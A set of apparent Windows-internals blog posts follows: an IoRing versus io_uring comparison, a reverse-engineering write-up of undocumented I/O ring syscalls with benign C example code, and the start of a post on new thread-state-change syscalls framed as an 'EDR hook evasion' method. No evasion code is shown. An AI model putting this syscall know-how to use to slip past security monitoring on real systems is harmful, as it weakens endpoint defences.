IoRing vs. io_uring: a comparison of Windows and Linux implementations

A few months ago I wrote this post about the introduction of I/O Rings in Windows. After publishing it a few people asked for a comparison of the Windows I/O Ring and the Linux io_uring, so I decided to do just that. The short answer – the Windows implementation is almost identical to the Linux one, especially when using the wrapper function provided by helper libraries. The long answer is what I’ll be covering in the rest of this post.
The information about the io_uring implementation was gathered mostly from here – a paper documenting the internal implementation and usage of io_uring on Linux and explaining some of the reasons for its existence and the way it was built.
As I said, the basic implementation of both mechanisms is very similar – both are built around a submission queue and a completion queue that have shared views in both user and kernel address spaces. The application writes the requested operation data into the submission queue and submits it to the kernel, which processes the requested number of entries and writes the results into the completion queue. In both cases there is a maximum number of allowed entries per ring and the completion queue can have up to However, there are some differences in the internal structures as well as the way the application is expected to interact with the I/O ring.

Initialization and Memory Mapping

One such difference is the initialization stage and mapping of the queues into user space: on Windows the kernel fully initializes the new ring, including the creation of both queues and creating a shared view in the application’s user-mode address space, using an MDL. However, in the Linux io_uring implementation, the system creates the requested ring and the queues but does not map them into user space. The application is expected to call mmap(2) using the appropriate file descriptors to map both queues into its address space, as well as the SQE array, which is separate from the main queue.
This is another difference worth noticing – on Linux the completion ring (or queue) directly contains the array of CQEs, but the submission ring does not. Instead, the sqes field in the submission ring is a pointer to another memory region containing the array of SQEs, that has to be mapped separately. To index this array, the sqring has an additional array field which contains the index into the SQEs array. Not being a Linux expert, I won’t try to explain the reasoning behind this design and will simply quote the reasoning given in the paper mentioned above:

This might initially seem odd and confusing, but there’s some reasoning behind it. Some applications may embed request units inside internal data structures, and this allows them the flexibility to do so while retaining the ability to submit multiple sqes in one operation. That in turns allows for easier conversion of said applications to the io_uring interface.

On Windows there are only two important regions since the SQEs are part of the submission ring. In fact both rings are allocated by the system in the same memory region so there is only one shared view between the user and kernel space, containing two separate rings.
One more difference exists when creating a new I/O ring: on Linux the number of entries in a submission ring can be between 1 and 0x1000 (4096) while on Windows it can be between 1 and 0x10000, but at least 8 entries will always be allocated. In both cases the completion queue will have twice the number of entries as the submission queue. There is one small difference regarding the exact number of entries requested for the ring: For technical reasons the number of entries in both rings has to be a power of two. On Windows, the system takes the requested ring size and aligns it to the nearest power of two to receive the actual size that will be used to allocate the ring memory. On Linux the system does not do that, and the application is expected to request a size that is a power of two.

Versioning

Windows puts far more focus on compatibility than Linux does, putting a lot of effort into making sure that when a new feature ships, applications using it will be able to work properly across different Windows builds even as the feature changes. For that reason, Windows implements versioning for its structures and features and Linux does not. Windows also implements I/O rings in phases, marked by those versions, where the first versions only implemented read operations, the next version will implement write and flush operations, and so on. When creating an I/O ring the caller needs to pass in a version to indicate which version of I/O rings it wants to use.
On Linux, however, the feature was implemented fully from the beginning and does not require versioning. Also, Linux doesn’t put as much focus on compatibility and users of io_uring are expected to use and support the latest features.

Waiting for Operation Completion

On both Windows and Linux the caller can choose to not wait on the completion of events in the I/O ring and simply get notified when all operations are complete, making this feature fully asynchronous. In both systems the caller can also choose to wait on all events in a fully synchronous way, specifying a timeout in case processing the events takes too long. Everything in between is the area where the systems differ.
On Linux, a caller can request a wait on the completion of a specific number of operations in the ring, a capability Windows doesn’t allow. This capability allows applications to start processing the results after a certain amount of operations were completed, instead of waiting for all of them. In newer builds Windows did add a similar yet slightly more limited option – registering a notification event that will be set when the first entry in the ring gets completed to signal to the waiting application that it’s safe to start processing the results now.

Helper Libraries

In both systems it is possible for an application to manage its rings itself through system calls. This is an option that’s accepted on Linux and highly discouraged on Windows, where the NT API is undocumented and officially should not be used by non-Microsoft code. However, in both systems most applications have no need to manage the rings themselves and a lot of a generic ring management code can be abstracted and managed by a separate component. This is done through helper libraries – KernelBase.dll on Windows and liburing on Linux.
Both libraries export generic functionality like creating, initializing and deleting an I/O ring, creating submission queue entries, submitting a ring and getting a result from the completion queue.
Both libraries use very similar functions and data structures, making the task of porting code from one platform to the other much easier.

Conclusion

The implementation of I/O rings on Windows is so similar to the Linux io_uring that it looks like some headers were almost copied from the io_uring implementation. There are some differences between the two features, mostly due to philosophical differences between the two systems and the role and responsibilities they give the user. The Linux io_uring was added a couple of years ago, making it a more mature feature than the new Windows implementation, though still a relatively young one and not without issues. It will be interesting to see where these two features will go in the future and what parity will exist in them in a few years.

I/O Rings – When One I/O Operation is Not Enough

Introduction

I usually write about security features or techniques on Windows. But today’s blog is not directly related to any security topics, other than the usual added risk that any new system call introduces. However, it’s an interesting addition to the I/O world in Windows that could be useful for developers and I thought it would be interesting to look into and write about. All this is to say – if you’re looking for a new exploit or EDR bypass technique, you should save yourselves the time and look at the other posts on this website instead.

For the three of you who are still reading, let’s talk about I/O rings!

I/O ring is a new feature on Windows preview builds. This is the Windows implementation of a ring buffer – a circular buffer, in this case used to queue multiple I/O operations simultaneously, to allow user-mode applications performing a lot of I/O operations to do so in one action instead of transitioning from user to kernel and back for every individual request.

This new feature adds a lot of new functions and internal data structures, so to avoid constantly breaking the flow of the blog with new data structures I will not put them as part of the post, but their definitions exist in the code sample at the end. I will only show a few internal data structures that aren’t used in the code sample.

I/O Ring Usage

The current implementation of I/O rings only supports read operations and allows queuing up to 0x10000 operations at a time. For every operation the caller will need to supply a handle to the target file, an output buffer, an offset into the file and amount of memory to be read. This is all done in multiple new data structures that will be discussed later. But first, the caller needs to initialize its I/O ring.

Create and Initialize an I/O Ring

To do that, the system supplies a new system call – NtCreateIoRing. This function creates an instance of a new IoRing object type, described here as IORING_OBJECT:

typedef struct _IORING_OBJECT
{
  USHORT Type;
  USHORT Size;
  NT_IORING_INFO Info;
  PSECTION SectionObject;
  PVOID KernelMappedBase;
  PMDL Mdl;
  PVOID MdlMappedBase;
  ULONG_PTR ViewSize;
  ULONG SubmitInProgress;
  PVOID IoRingEntryLock;
  PVOID EntriesCompleted;
  PVOID EntriesSubmitted;
  KEVENT RingEvent;
  PVOID EntriesPending;
  ULONG BuffersRegistered;
  PIORING_BUFFER_INFO BufferArray;
  ULONG FilesRegistered;
  PHANDLE FileHandleArray;
} IORING_OBJECT, *PIORING_OBJECT;

NtCreateIoRing receives one new structure as an input argument – IO_RING_STRUCTV1. This structure contains information about current version, which currently can only be 1, required and advisory flags (both don’t currently support any values other than 0) and the requested size for the submission queue and completion queue.

The function receives this information and does the following things:

  1. Validates all the input and output arguments – their addresses, size alignment, etc.
  2. Checks the requested submission queue size and calculate the amount of memory needed for the submission queue based on the requested number of entries.
    1. If SubmissionQueueSize is over 0x10000 a new error status STATUS_IORING_SUBMISSION_QUEUE_TOO_BIG gets returned.
  3. Checks the completions queue size and calculates the amount of memory needed for it.
    1. The completion queue is limited to 0x20000 entries and error code STATUS_IORING_COMPLETION_QUEUE_TOO_BIG is returned if a larger number is requested.
  4. Creates a new object of type IoRingObjectType and initializes all fields that can be initialized at this point – flags, submission queue size and mask, event, etc.
  5. Creates a section for the queues, maps it in system space and creates an MDL to back it. Then maps the same section in user-space. This section will contain the submission space and completion space and will be used by the application to communicate the parameters for all requested I/O operations with the kernel and receive the status codes.
  6. Initializes the output structure with the submission queue address and other data to be returned to the caller.

After NtCreateIoRing returns successfully, the caller can write its data into the supplied submission queue. The queue will have a queue head, followed by an array of NT_IORING_SQE structures, each representing one requested I/O operation. The header describes which entries should be processed at this time:

The queue header describes which entries should be processes using the QueueIndex and QueueCount fields. QueueIndex specifies the index of the first entry to be processes, and QueueCount specifies the amount of entries. QueueCount - QueueIndex has to be lower that total number of entries.

Each queue entry contains data about the requested operation: file handle, file offset, output buffer base, offset and amount of data to be read.  It also contains an OpCode field to specify the requested operation.

I/O Ring Operation Codes

There are four possible operation types that can be requested by the caller:

  1. IORING_OP_READ: requests that the system reads data from a file into an output buffer. The file handle will be read from the FileRef field in the submission queue entry. This will either be interpreted as a file handle or as an index into a pre-registered array of file handles, depending on whether the IORING_SQE_PREREGISTERED_FILE flag (1) is set in the queue entry Flags field. The output will be written into an output buffer supplied in the Buffer field of the entry. Similar to FileRef, this field can instead contain an index into a pre-registered array of output buffers if the IORING_SQE_PREREGISTERED_BUFFER flag (2) is set.
  2. IORING_OP_REGISTERED_FILES: requests pre-registration of file handles to be processed later. In this case the Buffer field of the queue entry points to an array of file handles. The requested file handles will get duplicated and placed in a new array, in the FileHandleArray field of the queue entry. The FilesRegistered field will contain the number of file handles.
  3. IORING_OP_REGISTERED_BUFFERS: requests pre-registration of output buffers for file data to be read into. In this case, the Buffer field in the entry should contain an array of IORING_BUFFER_INFO structures, describing addresses and sizes of buffers into which file data will be read:

    typedef struct _IORING_BUFFER_INFO
    {
        PVOID Address;
        ULONG Length;
    } IORING_BUFFER_INFO, *PIORING_BUFFER_INFO;

    The buffers’ addresses and sizes will be copied into a new array and placed in the BufferArray field of the submission queue. The BuffersRegistered field will contain the number of buffers.

  4. IORING_OP_CANCEL: requests the cancellation of a pending operation for a file. Just like the in IORING_OP_READ, the FileRef can be a handle or an index into the file handle array depending on the flags. In this case the Buffer field points to the IO_STATUS_BLOCK to be canceled for the file.

All these options can be a bit confusing so here are illustrations for the 4 different reading scenarios, based on the requested flags:

Flags are 0, using the FileRef field as a file handle and the Buffer field as a pointer to the output buffer:

Flag IORING_SQE_PREREGISTERED_FILE (1) is requested, so FileRef is treated as an index into an array of pre-registered file handles and Buffer is a pointer to the output buffer:

Flag IORING_SQE_PREREGISTERED_BUFFER (2) is requested, so FileRef is a handle to a file and Buffer is treated as an index into an array of pre-registered output buffers:

Both IORING_SQE_PREREGISTERED_FILE and IORING_SQE_PREREGISTERED_BUFFER flags are set, so FileRef is treated as an index into a pre-registered file handle array and Buffer is treated as index into a pre-registered buffers array:

Submitting and Processing I/O Ring

Once the caller set up all its submission queue entries, it can call NtSubmitIoRing to submit its requests to the kernel to get processed according to the requested parameters. Internally, NtSubmitIoRing iterates over all the entries and calls IopProcessIoRingEntry, sending the IoRing object and the current queue entry. The entry gets processed according to the specified OpCode and then calls IopIoRingDispatchComplete to fill in the completion queue. The completion queue, much like the submission queue, begins with a header, containing a queue index and count, followed by an array of entries. Each entry is an IORING_CQE structure – it has the UserData value from the submission queue entry and the Status and Information from the IO_STATUS_BLOCK for the operation:

typedef struct _IORING_CQE
{
    UINT_PTR UserData;
    HRESULT ResultCode;
    ULONG_PTR Information;
} IORING_CQE, *PIORING_CQE;

Once all requested entries are completed the system sets the event in IoRingObject->RingEvent. As long as not all entries are complete the system will wait on the event using the Timeout received from the caller and wake up when all requests are completed, causing the event to be signaled, or when the timeout expires.

Since multiple entries can be processed, the status returned to the caller will either be an error status indicating a failure to process the entries or the return value of KeWaitForSingleObject. Status codes for individual operations can be found in the completion queue – so don’t confuse receiving a STATUS_SUCCESS code from NtSubmitIoRing with successful read operations!

Using I/O Ring – The Official Way

Like other system calls, those new IoRing functions are not documented and not meant to be used directly. Instead, KernelBase.dll offers convenient wrapper functions that receive easy-to-use arguments and internally handle all the undocumented functions and data structures that need to be sent to the kernel. There are functions to create, query, submit and close the IoRing, as well as helper functions to build queue entries for the four different operations, which were discussed earlier.

CreateIoRing

CreateIoRing receives information about flags and queue sizes, and internally calls NtCreateIoRing and returns a handle to an IoRing instance:

HRESULT
CreateIoRing (
    _In_ IORING_VERSION IoRingVersion,
    _In_ IORING_CREATE_FLAGS Flags,
    _In_ UINT32 SubmissionQueueSize,
    _In_ UINT32 CompletionQueueSize,
    _Out_ HIORING* Handle
);

This new handle type is actually a pointer to an undocumented structure containing the structure returned from NtCreateIoRing and other data needed to manage this IoRing instance:

typedef struct _HIORING
{
    ULONG SqePending;
    ULONG SqeCount;
    HANDLE handle;
    IORING_INFO Info;
    ULONG IoRingKernelAcceptedVersion;
} HIORING, *PHIORING;

All the other IoRing functions will receive this handle as their first argument.

After creating an IoRing instance, the application needs to build queue entries for all the requested I/O operations. Since the internal structure of the queues and the queue entry structures are not documented, KernelBase.dll exports helper functions to build those using input data supplied by the caller. There are four functions for this purpose:

  1. BuildIoRingReadFile
  2. BuildIoRingRegisterBuffers
  3. BuildIoRingRegisterFileHandles
  4. BuildIoRingCancelRequest

Each function create adds a new queue entry to the submission queue with the required opcode and data. Their names make their purposes pretty obvious but lets go over them one by one just for clarity:

BuildIoRingReadFile

HRESULT
BuildIoRingReadFile (
    _In_ HIORING IoRing,
    _In_ IORING_HANDLE_REF FileRef,
    _In_ IORING_BUFFER_REF DataRef,
    _In_ ULONG NumberOfBytesToRead,
    _In_ ULONG64 FileOffset,
    _In_ ULONG_PTR UserData,
    _In_ IORING_SQE_FLAGS Flags
);

The function receives the handle returned by CreateIoRing followed by two pointers to new data structures. Both of these structures have a Kind field, which can be either IORING_REF_RAW, indicating that the supplied value is a raw reference, or IORING_REF_REGISTERED, indicating that the value is an index into a pre-registered array. The second field is a union of a value and an index, in which the file handle or buffer will be supplied.

BuildIoRingRegisterFileHandles and BuildIoRingRegisterBuffers

HRESULT
BuildIoRingRegisterFileHandles (
    _In_ HIORING IoRing,
    _In_ ULONG Count,
    _In_ HANDLE const Handles[],
    _In_ PVOID UserData
);

HRESULT
BuildIoRingRegisterBuffers (
    _In_ HIORING IoRing,
    _In_ ULONG Count,
    _In_ IORING_BUFFER_INFO count Buffers[],
    _In_ PVOID UserData
);

These two functions create submission queue entries to pre-register file handles and output buffers. Both receive the handle returned from CreateIoRing, the count of pre-registered files/buffers in the array, an array of the handles or buffers to register and UserData.

In BuildIoRingRegisterFileHandles, Handles is a pointer to an array of file handles and in BuildIoRingRegisterBuffers, Buffers is a pointer to an array of IORING_BUFFER_INFO structures containing Buffer base and size.

BuildIoRingCancelRequest

HRESULT
BuildIoRingCancelRequest (
    _In_ HIORING IoRing,
    _In_ IORING_HANDLE_REF File,
    _In_ PVOID OpToCancel,
    _In_ PVOID UserData
);

Just like the other functions, BuildIoRingCancelRequest receives as its first argument the handle that was returned from CreateIoRing. The second argument is again a pointer to an IORING_REQUEST_DATA structure that contains the handle (or index in the file handles array) to the file whose operation should be canceled. The third and fourth arguments are the output buffer and UserData to be placed in the queue entry.

After all queue entries were built with those functions, the queue can be submitted:

SubmitIoRing

HRESULT
SubmitIoRing (
    _In_ HIORING IoRingHandle,
    _In_ ULONG WaitOperations,
    _In_ ULONG Milliseconds,
    _Out_ PULONG SubmittedEntries
);

The function receives the same handle as the first argument that was used to initialize the IoRing and submission queue. Then it receives the amount of entries to submit, time in milliseconds to wait on the completion of the operations, and a pointer to an output parameter that will receive the number of entries that were submitted.

GetIoRingInfo

HRESULT
GetIoRingInfo (
    _In_ HIORING IoRingHandle,
    _Out_ PIORING_INFO IoRingBasicInfo
);

This API returns information about the current state of the IoRing with a new structure:

typedef struct _IORING_INFO
{
  IORING_VERSION IoRingVersion;
  IORING_CREATE_FLAGS Flags;
  ULONG SubmissionQueueSize;
  ULONG CompletionQueueSize;
} IORING_INFO, *PIORING_INFO;

This contains the version and flags of the IoRing as well as the current size of the submission and completion queues.

Once all operations on the IoRing are done, it needs be closed using CloseIoRing which receives the handle as its only argument and closes the handle to the IoRing object and frees the memory used for the structure.

So far I couldn’t find anything on the system that makes use of this feature, but once 21H2 is released I’d expect to start seeing I/O-heavy Windows applications start using it, probably mostly in server and azure environments.

Conclusion

So far, no public documentation exists for this new addition to the I/O world in Windows, but hopefully when 21H2 is released later this year we will see all of this officially documented and used by both Windows and 3rd party applications. If used wisely, this could lead to significant performance improvements for applications that have frequent read operations. Like every new feature and system call this could also have unexpected security effects. One bug was already found by hFiref0x, who was the first to publicly mention this feature and managed to crash the system by sending an incorrect parameter to NtCreateIoRing – a bug that was fixed since then. Looking more closely into these functions will likely lead to more such discoveries and interesting side effects of this new mechanism.

Code

Here’s a small PoC showing two ways to use I/O rings – either through the official KernelBase API, or through the internal ntdll API. For the code to compile properly make sure to link it against onecoreuap.lib (for the KernelBase functions) or ntdll.lib (for the ntdll functions):

#include <ntstatus.h>
#define WIN32_NO_STATUS
#include <Windows.h>
#include <cstdio>
#include <ioringapi.h>
#include <winternal.h>

typedef struct _IO_RING_STRUCTV1
{
    ULONG IoRingVersion;
    ULONG SubmissionQueueSize;
    ULONG CompletionQueueSize;
    ULONG RequiredFlags;
    ULONG AdvisoryFlags;
} IO_RING_STRUCTV1, *PIO_RING_STRUCTV1;

typedef struct _IORING_QUEUE_HEAD
{
    ULONG QueueIndex;
    ULONG QueueCount;
    ULONG64 Aligment;
} IORING_QUEUE_HEAD, *PIORING_QUEUE_HEAD;

typedef struct _NT_IORING_INFO
{
    ULONG Version;
    IORING_CREATE_FLAGS Flags;
    ULONG SubmissionQueueSize;
    ULONG SubQueueSizeMask;
    ULONG CompletionQueueSize;
    ULONG CompQueueSizeMask;
    PIORING_QUEUE_HEAD SubQueueBase;
    PVOID CompQueueBase;
} NT_IORING_INFO, *PNT_IORING_INFO;

typedef struct _NT_IORING_SQE
{
    ULONG Opcode;
    ULONG Flags;
    HANDLE FileRef;
    LARGE_INTEGER FileOffset;
    PVOID Buffer;
    ULONG BufferSize;
    ULONG BufferOffset;
    ULONG Key;
    PVOID Unknown;
    PVOID UserData;
    PVOID stuff1;
    PVOID stuff2;
    PVOID stuff3;
    PVOID stuff4;
} NT_IORING_SQE, *PNT_IORING_SQE;

EXTERN_C_START
NTSTATUS
NtSubmitIoRing (
    _In_ HANDLE Handle,
    _In_ IORING_CREATE_REQUIRED_FLAGS Flags,
    _In_ ULONG EntryCount,
    _In_ PLARGE_INTEGER Timeout
    );

NTSTATUS
NtCreateIoRing (
    _Out_ PHANDLE pIoRingHandle,
    _In_ ULONG CreateParametersSize,
    _In_ PIO_RING_STRUCTV1 CreateParameters,
    _In_ ULONG OutputParametersSize,
    _Out_ PNT_IORING_INFO pRingInfo
    );

NTSTATUS
NtClose (
    _In_ HANDLE Handle
    );

EXTERN_C_END

void IoRingNt ()
{
    NTSTATUS status;
    IO_RING_STRUCTV1 ioringStruct;
    NT_IORING_INFO ioringInfo;
    HANDLE handle;
    PNT_IORING_SQE sqe;
    LARGE_INTEGER timeout;
    HANDLE hFile = NULL;
    ULONG sizeToRead = 0x200;
    PVOID *buffer = NULL;
    ULONG64 endOfBuffer;

    ioringStruct.IoRingVersion = 1;
    ioringStruct.SubmissionQueueSize = 1;
    ioringStruct.CompletionQueueSize = 1;
    ioringStruct.AdvisoryFlags = IORING_CREATE_ADVISORY_FLAGS_NONE;
    ioringStruct.RequiredFlags = IORING_CREATE_REQUIRED_FLAGS_NONE;

    status = NtCreateIoRing(&handle,
                            sizeof(ioringStruct),
                            &ioringStruct,
                            sizeof(ioringInfo),
                            &ioringInfo);
    if (!NT_SUCCESS(status))
    {
        printf("Failed creating IO ring handle: 0x%x\n", status);
        goto Exit;
    }

    ioringInfo.SubQueueBase->QueueCount = 1;
    ioringInfo.SubQueueBase->QueueIndex = 0;
    ioringInfo.SubQueueBase->Aligment = 0;

    hFile = CreateFile(L"C:\\Windows\\System32\\notepad.exe",
                       GENERIC_READ,
                       0,
                       NULL,
                       OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL,
                       NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed opening file handle: 0x%x\n", GetLastError());
        goto Exit;
    }

    sqe = (PNT_IORING_SQE)((ULONG64)ioringInfo.SubQueueBase + sizeof(IORING_QUEUE_HEAD));
    sqe->Opcode = 1;
    sqe->Flags = 0;
    sqe->FileRef = hFile;
    sqe->FileOffset.QuadPart = 0;
    buffer = (PVOID*)VirtualAlloc(NULL, sizeToRead, MEM_COMMIT, PAGE_READWRITE);
    if (buffer == NULL)
    {
        printf("Failed allocating memory\n");
        goto Exit;
    }
    sqe->Buffer = buffer;
    sqe->BufferOffset = 0;
    sqe->BufferSize = sizeToRead;
    sqe->Key = 1234;
    sqe->UserData = nullptr;

    timeout.QuadPart = -10000;

    status = NtSubmitIoRing(handle, IORING_CREATE_REQUIRED_FLAGS_NONE, 1, &timeout);
    if (!NT_SUCCESS(status))
    {
        printf("Failed submitting IO ring: 0x%x\n", status);
        goto Exit;
    }
    printf("Data from file:\n");
    endOfBuffer = (ULONG64)buffer + sizeToRead;
    for (; (ULONG64)buffer < endOfBuffer; buffer++)
    {
        printf("%p ", *buffer);
    }
    printf("\n");

Exit:
    if (handle)
    {
        NtClose(handle);
    }
    if (hFile)
    {
        NtClose(hFile);
    }
    if (buffer)
    {
        VirtualFree(buffer, NULL, MEM_RELEASE);
    }
}

void IoRingKernelBase ()
{
    HRESULT result;
    HIORING handle;
    IORING_CREATE_FLAGS flags;
    IORING_HANDLE_REF requestDataFile;
    IORING_BUFFER_REF requestDataBuffer;
    UINT32 submittedEntries;
    HANDLE hFile = NULL;
    ULONG sizeToRead = 0x200;
    PVOID *buffer = NULL;
    ULONG64 endOfBuffer;

    flags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
    flags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
    result = CreateIoRing(IORING_VERSION_1, flags, 1, 1, &handle);
    if (!SUCCEEDED(result))
    {
        printf("Failed creating IO ring handle: 0x%x\n", result);
        goto Exit;
    }

    hFile = CreateFile(L"C:\\Windows\\System32\\notepad.exe",
                       GENERIC_READ,
                       0,
                       NULL,
                       OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL,
                       NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed opening file handle: 0x%x\n", GetLastError());
        goto Exit;
    }
    requestDataFile.Kind = IORING_REF_RAW;
    requestDataFile.Handle = hFile;
    requestDataBuffer.Kind = IORING_REF_RAW;
    buffer = (PVOID*)VirtualAlloc(NULL,
                                  sizeToRead,
                                  MEM_COMMIT,
                                  PAGE_READWRITE);
    if (buffer == NULL)
    {
        printf("Failed to allocate memory\n");
        goto Exit;
    }
    requestDataBuffer.Buffer = buffer;
    result = BuildIoRingReadFile(handle,
                                 requestDataFile,
                                 requestDataBuffer,
                                 sizeToRead,
                                 0,
                                 NULL,
                                 IOSQE_FLAGS_NONE);
    if (!SUCCEEDED(result))
    {
        printf("Failed building IO ring read file structure: 0x%x\n", result);
        goto Exit;
    }

    result = SubmitIoRing(handle, 1, 10000, &submittedEntries);
    if (!SUCCEEDED(result))
    {
        printf("Failed submitting IO ring: 0x%x\n", result);
        goto Exit;
    }
    printf("Data from file:\n");
    endOfBuffer = (ULONG64)buffer + sizeToRead;
    for (; (ULONG64)buffer < endOfBuffer; buffer++)
    {
        printf("%p ", *buffer);
    }
    printf("\n");

Exit:
    if (handle != 0)
    {
        CloseIoRing(handle);
    }
    if (hFile)
    {
        NtClose(hFile);
    }
    if (buffer)
    {
        VirtualFree(buffer, NULL, MEM_RELEASE);
    }
}

int main ()
{
    IoRingKernelBase();
    IoRingNt();
    ExitProcess(0);
}

Thread and Process State Change

a.k.a: EDR Hook Evasion – Method #4512

Every couple of weeks a new build of Windows Insider gets released. Some have lots of changes and introduce completely new features, some only have minor bug fixes, and some simply insist on crashing repeatedly for no good reason. A few months ago one of those builds had a few surprising changes — It introduced 2 new object types and 4 new system calls, not something that happens every day. So of course I went investigating. What I discovered is a confusingly over-engineered feature, which was added to solve a problem that could have been solved by much simpler means and which has the side effect of supplying attackers with a new way to evade EDR hooks.

Suspending and Resuming Threads – Now With 2 Extra Steps!

The problem that this feature is trying to solve is this: what happens if a process suspends a thread and then terminates before resuming it? Unless some other part of the system realizes what happened, the thread will remain suspended forever and will never resume its execution. To solve that, this new feature allows suspending and resuming threads and processes through the new object types, which will keep track of the suspension state of the threads or processes. That way, when the object is destroyed (for example, when the process that created it is terminated), the system will reset the state of the target process or thread by suspending or resuming it as needed.

This feature is pretty easy to use – the caller first needs to call NtCreateThreadStateChange (or NtCreateProcessStateChange. Both cases are almost identical but we’ll stay with the thread case for simplicity) to create a new object of type PspThreadStateChangeType. This object type is not documented, but its internal structure looks something like this:

struct _THREAD_STATE_OBJECT
{
    PETHREAD Thread;
    EX_PUSH_LOCK Lock;
    ULONG ThreadSuspendCount;
} THREAD_STATE_OBJECT, *PTHREAD_STATE_OBJECT;

NtCreateThreadStateChange has the following prototype:

NTSTATUS
NtCreateThreadStateChange (
    _Out_ PHANDLE StateChangeHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ThreadHandle,
    _In_ ULONG Unused
);

The 2 arguments we are interested in are the first one, which will receive a handle to the new object, and the fourth — a handle to the thread that will be referenced by the structure. Any future suspend or resume operation that will be done through this object can only work on the thread that’s being passed into this function. NtCreateProcessStateChange will create a new object instance, set the thread pointer to the requested thread, and initialize the lock and count fields to zero.

When calling NtCreateProcessStateChange to operate on a process, the thread handle will be replaced with a process handle and the object that will be created will be of type PspProcessStateChangeType. The only change in the structure is that the ETHREAD pointer is replaced with an EPROCESS pointer.

The next step is calling NtChangeThreadState (or NtChangeProcessState, if operating on a process). This function receives a handle to the thread state change object, a handle to the same thread that was passed when creating the object, and an action, which is an enum value:

typedef enum _THREAD_STATE_CHANGE_TYPE
{
    ThreadStateChangeSuspend = 0,
    ThreadStateChangeResume = 1,
    ThreadStateChangeMax = 2,
} THREAD_STATE_CHANGE_TYPE, *PTHREAD_STATE_CHANGE_TYPE;

typedef enum _PROCESS_STATE_CHANGE_TYPE
{
    ProcessStateChangeSuspend = 0,
    ProcessStateChangeResume = 1,
    ProcessStateChangeMax = 2,
} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;

It also receives an “Extended Information” variable and its length, both of which are unused and must be zero, and another reserved argument that must also be zero. The function will validate that the thread pointed to by the thread state change object is the same as the thread whose handle was passed into the function, and then call the appropriate function based on the requested action – PsSuspendThread or PsMultiResumeThread. Then it will increment or decrement the ThreadSuspendCount field based on the action that was performed. There are 2 limitations enforced by the suspend count:

  1. A thread cannot be resumed if the object’s ThreadSuspendCount is zero, even if the thread is currently suspended. It must be suspended and resumed using the state change API, otherwise things will start acting funny.
  2. A thread cannot be suspended if ThreadSuspendCount is 0x7FFFFFFF. This is meant to avoid overflowing the counter. However, this is a weird limitation since KeSuspendThread (the internal function called from PsSuspendThread) already enforces a suspension limit of 127 through the thread’s SuspendCount field, and will throw an error STATUS_SUSPEND_COUNT_EXCEEDED if the count exceeds that.

So far this works like the classic suspend and resume mechanism, just with a few extra steps. A caller still needs to make an API call to suspend a thread or process and another one to resume it.  But the benefit of having new object types is that objects can have kernel routines that get called for certain operations related to the object, such as open, close and delete:

dx (*(nt!_OBJECT_TYPE**)&nt!PspThreadStateChangeType)->TypeInfo
    (*(nt!_OBJECT_TYPE**)&nt!PspThreadStateChangeType)->TypeInfo                 [Type: _OBJECT_TYPE_INITIALIZER]
    [+0x000] Length           : 0x78 [Type: unsigned short]
    [+0x002] ObjectTypeFlags  : 0x6 [Type: unsigned short]
    [+0x002 ( 0: 0)] CaseInsensitive  : 0x0 [Type: unsigned char]
    [+0x002 ( 1: 1)] UnnamedObjectsOnly : 0x1 [Type: unsigned char]
    [+0x002 ( 2: 2)] UseDefaultObject : 0x1 [Type: unsigned char]
    [+0x002 ( 3: 3)] SecurityRequired : 0x0 [Type: unsigned char]
    [+0x002 ( 4: 4)] MaintainHandleCount : 0x0 [Type: unsigned char]
    [+0x002 ( 5: 5)] MaintainTypeList : 0x0 [Type: unsigned char]
    [+0x002 ( 6: 6)] SupportsObjectCallbacks : 0x0 [Type: unsigned char]
    [+0x002 ( 7: 7)] CacheAligned     : 0x0 [Type: unsigned char]
    [+0x003 ( 0: 0)] UseExtendedParameters : 0x0 [Type: unsigned char]
    [+0x003 ( 7: 1)] Reserved         : 0x0 [Type: unsigned char]
    [+0x004] ObjectTypeCode   : 0x0 [Type: unsigned long]
    [+0x008] InvalidAttributes : 0x92 [Type: unsigned long]
    [+0x00c] GenericMapping   [Type: _GENERIC_MAPPING]
    [+0x01c] ValidAccessMask  : 0x1f0001 [Type: unsigned long]
    [+0x020] RetainAccess     : 0x0 [Type: unsigned long]
    [+0x024] PoolType         : PagedPool (1) [Type: _POOL_TYPE]
    [+0x028] DefaultPagedPoolCharge : 0x70 [Type: unsigned long]
    [+0x02c] DefaultNonPagedPoolCharge : 0x0 [Type: unsigned long]
    [+0x030] DumpProcedure    : 0x0 [Type: void (__cdecl*)(void *,_OBJECT_DUMP_CONTROL *)]
    [+0x038] OpenProcedure    : 0x0 [Type: long (__cdecl*)(_OB_OPEN_REASON,char,_EPROCESS *,void *,unsigned long *,unsigned long)]
    [+0x040] CloseProcedure   : 0x0 [Type: void (__cdecl*)(_EPROCESS *,void *,unsigned __int64,unsigned __int64)]
    [+0x048] DeleteProcedure  : 0xfffff80265650d20 [Type: void (__cdecl*)(void *)]
    [+0x050] ParseProcedure   : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,_SECURITY_QUALITY_OF_SERVICE *,void * *)]
    [+0x050] ParseProcedureEx : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,_SECURITY_QUALITY_OF_SERVICE *,_OB_EXTENDED_PARSE_PARAMETERS *,void * *)]
    [+0x058] SecurityProcedure : 0xfffff802656bffd0 [Type: long (__cdecl*)(void *,_SECURITY_OPERATION_CODE,unsigned long *,void *,unsigned long *,void * *,_POOL_TYPE,_GENERIC_MAPPING *,char)]
    [+0x060] QueryNameProcedure : 0x0 [Type: long (__cdecl*)(void *,unsigned char,_OBJECT_NAME_INFORMATION *,unsigned long,unsigned long *,char)]
    [+0x068] OkayToCloseProcedure : 0x0 [Type: unsigned char (__cdecl*)(_EPROCESS *,void *,void *,char)]
    [+0x070] WaitObjectFlagMask : 0x0 [Type: unsigned long]
    [+0x074] WaitObjectFlagOffset : 0x0 [Type: unsigned short]
    [+0x076] WaitObjectPointerOffset : 0x0 [Type: unsigned short]

